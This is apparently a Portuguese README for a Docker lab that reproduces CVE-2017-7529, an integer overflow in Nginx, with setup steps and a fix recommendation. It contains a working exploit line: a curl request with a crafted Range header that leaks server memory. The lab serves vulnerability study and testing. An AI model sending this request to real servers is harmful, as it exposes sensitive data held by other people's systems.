
Ambiente de reprodução baseado em Docker para a vulnerabilidade de estouro de inteiro CVE-2017-7529 no Nginx, demonstrando divulgação de informações através de cabeçalhos Range manipulados, com guia de exploração passo a passo.
O Nginx é um servidor web de alto desempenho e amplamente utilizado como proxy reverso, servidor de cache, etc., sendo um servidor web de código aberto.
Em versões do Nginx iguais ou inferiores a 1.13.2, existe uma vulnerabilidade de estouro de inteiro que permite a um atacante manipular o cabeçalho Range para vazar fragmentos de memória ou informações sensíveis além do escopo da resposta original.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
Esta vulnerabilidade pode causar vazamento de informações (Information Disclosure) com apenas uma simples requisição HTTP.
Se informações de configuração sensíveis ou outros dados passíveis de vazamento estiverem incluídos, pode levar a um grave incidente de segurança.
Correção: recomenda-se atualizar para Nginx 1.13.3 ou superior.
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- este documento